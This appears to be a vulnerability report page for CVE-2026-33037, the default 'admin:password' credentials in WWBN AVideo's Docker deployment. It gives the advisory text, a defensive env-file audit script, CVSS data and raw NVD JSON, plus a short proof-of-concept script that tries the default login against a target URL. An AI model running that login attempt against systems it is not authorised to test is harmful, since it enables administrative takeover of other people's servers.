Security Vulnerability Report
CVE-2026-33037 CVSS 8.1 HIGH

CVE-2026-33037

Published: 2026-03-20 06:16:12
Last Modified: 2026-03-23 16:25:29

Description

WWBN AVideo is an open source video platform. In versions 25.0 and below, the official Docker deployment files (docker-compose.yml, env.example) ship with the admin password set to "password", which is automatically used to seed the admin account during installation, meaning any instance deployed without overriding SYSTEM_ADMIN_PASSWORD is immediately vulnerable to trivial administrative takeover. No compensating controls exist: there is no forced password change on first login, no complexity validation, no default-password detection, and the password is hashed with weak MD5. Full admin access enables user data exposure, content manipulation, and potential remote code execution via file uploads and plugin management. The same insecure-default pattern extends to database credentials (avideo/avideo), compounding the risk. Exploitation depends on operators failing to change the default, a condition likely met in quick-start, demo, and automated deployments. This issue has been fixed in version 26.0.
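A defender-side check for the insecure defaults the description names, added here as an example and not taken from the page or the AVideo project: it parses a dotenv-style file (or the `- KEY=VALUE` items of a compose `environment:` list), flags values still equal to the shipped defaults, flags a missing variable (since the installer seeds the account from it), and flags passwords shorter than a locally chosen minimum. Only SYSTEM_ADMIN_PASSWORD is a variable name the advisory states; the MYSQL_USER and MYSQL_PASSWORD names, the minimum length, and the sample env blocks are constructed assumptions for illustration.

```python
"""Audit a dotenv-style deployment file for the insecure defaults described in
CVE-2026-33037. Added example, not code from the AVideo project."""
import re
import sys

# Shipped defaults named in the advisory. SYSTEM_ADMIN_PASSWORD is the variable
# the advisory names; the two MYSQL_* names are assumptions for illustration.
INSECURE_DEFAULTS = {
    "SYSTEM_ADMIN_PASSWORD": {"password"},
    "MYSQL_USER": {"avideo"},
    "MYSQL_PASSWORD": {"avideo"},
}
MIN_PASSWORD_LENGTH = 12  # local policy value chosen for this example

# KEY=VALUE with optional "export " prefix; value may be quoted.
_ENV_LINE = re.compile(r"^(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*?)\s*$")


def parse_env(text):
    """Parse KEY=VALUE lines into a dict. Skips blanks and comments, accepts
    compose-style "- KEY=VALUE" list items, strips matching surrounding quotes.
    A later assignment overrides an earlier one, as dotenv loaders do."""
    env = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("- "):          # docker-compose environment: list item
            line = line[2:].strip()
        if not line or line.startswith("#"):
            continue
        match = _ENV_LINE.match(line)
        if not match:
            continue
        key, value = match.group(1), match.group(2)
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        env[key] = value
    return env


def audit_env(env):
    """Return (variable, status, detail) findings; an empty list means clean."""
    findings = []
    for key, shipped in INSECURE_DEFAULTS.items():
        value = env.get(key)
        if value is None:
            findings.append((key, "MISSING",
                             "not set; installer may seed a built-in default"))
        elif value in shipped:
            findings.append((key, "DEFAULT",
                             f"still equal to the shipped default {value!r}"))
        elif key.endswith("PASSWORD") and len(value) < MIN_PASSWORD_LENGTH:
            findings.append((key, "WEAK",
                             f"shorter than {MIN_PASSWORD_LENGTH} characters"))
    return findings


# Constructed sample inputs (not the project's real files).
SHIPPED_DEFAULTS = """
# modelled on the advisory's description of env.example
SYSTEM_ADMIN_PASSWORD=password
MYSQL_USER=avideo
MYSQL_PASSWORD=avideo
"""

HARDENED = """
SYSTEM_ADMIN_PASSWORD="Xk9#vQ2!mL7pR4wZ"
environment:
  - MYSQL_USER=avideo_app
  - MYSQL_PASSWORD='tR8$nB3@hJ6yW1qE'
"""


def report(text):
    """Audit one file's contents and return True when no finding was raised."""
    findings = audit_env(parse_env(text))
    for key, status, detail in findings:
        print(f"[{status}] {key}: {detail}")
    return not findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SHIPPED_DEFAULTS
    sys.exit(0 if report(text) else 1)
```

Run it as `python audit_env.py path/to/.env` in a CI step or a pre-deploy hook; a non-zero exit blocks the deployment while any shipped default is still in place, which addresses the "quick-start, demo, and automated deployments" case the advisory singles out. The MISSING status matters because the vulnerability is triggered by omission: an env file that never sets SYSTEM_ADMIN_PASSWORD is exactly the case where the installer seeds "password".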

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 25.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-33037: Default Admin Credential Takeover
# This script attempts to log in to the AVideo admin panel using default credentials.
import requests


def check_default_creds(target_url):
    login_url = f"{target_url}/user/login"
    # Default credentials mentioned in the advisory
    payload = {
        "user": "admin",
        "pass": "password",
        "submit": "Login",
    }
    try:
        session = requests.Session()
        response = session.post(login_url, data=payload, timeout=10)
        # Check if login was successful (heuristic: look for dashboard content in the response)
        if response.status_code == 200 and "dashboard" in response.text.lower():
            return "[+] Vulnerable! Default credentials 'admin:password' worked."
        elif "Incorrect" in response.text or "Invalid" in response.text:
            return "[-] Not vulnerable or credentials changed."
        else:
            return "[?] Uncertain response. Manual verification recommended."
    except requests.RequestException as e:
        # Connection refused, timeout, DNS failure, etc.
        return f"[!] Error connecting to target: {e}"


if __name__ == "__main__":
    target = "http://target-ip:port"  # Replace with actual target
    print(check_default_creds(target))

References

https://github.com/WWBN/AVideo/commit/2075fac1a51f21fab5d8592235a095aa354a9de6 (Patch)
https://github.com/WWBN/AVideo/security/advisories/GHSA-89rv-p523-6wg9 (Exploit, Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33037",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T06:16:11.817",
    "lastModified": "2026-03-23T16:25:29.030",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "WWBN AVideo is an open source video platform. In versions 25.0 and below, the official Docker deployment files (docker-compose.yml, env.example) ship with the admin password set to \"password\", which is automatically used to seed the admin account during installation, meaning any instance deployed without overriding SYSTEM_ADMIN_PASSWORD is immediately vulnerable to trivial administrative takeover. No compensating controls exist: there is no forced password change on first login, no complexity validation, no default-password detection, and the password is hashed with weak MD5. Full admin access enables user data exposure, content manipulation, and potential remote code execution via file uploads and plugin management. The same insecure-default pattern extends to database credentials (avideo/avideo), compounding the risk. Exploitation depends on operators failing to change the default, a condition likely met in quick-start, demo, and automated deployments. This issue has been fixed in version 26.0."
      },
      {
        "lang": "es",
        "value": "WWBN AVideo es una plataforma de video de código abierto. En las versiones 25.0 e inferiores, los archivos oficiales de despliegue de Docker (docker-compose.yml, env.example) se distribuyen con la contraseña de administrador establecida como 'password', que se utiliza automáticamente para inicializar la cuenta de administrador durante la instalación, lo que significa que cualquier instancia desplegada sin sobrescribir SYSTEM_ADMIN_PASSWORD es inmediatamente vulnerable a una toma de control administrativa trivial. No existen controles compensatorios: no hay cambio de contraseña forzado en el primer inicio de sesión, no hay validación de complejidad, no hay detección de contraseña por defecto, y la contraseña se hashea con un MD5 débil. El acceso completo de administrador permite la exposición de datos de usuario, la manipulación de contenido y la potencial ejecución remota de código a través de la carga de archivos y la gestión de plugins. El mismo patrón de valores predeterminados inseguros se extiende a las credenciales de la base de datos (avideo/avideo), lo que agrava el riesgo. La explotación depende de que los operadores no cambien el valor predeterminado, una condición que probablemente se cumpla en despliegues de inicio rápido, demostraciones y automatizados. Este problema ha sido solucionado en la versión 26.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-1188"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "26.0",
                "matchCriteriaId": "B468F0CE-E5E7-4607-BD15-B5763C47493E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/WWBN/AVideo/commit/2075fac1a51f21fab5d8592235a095aa354a9de6",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-89rv-p523-6wg9",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}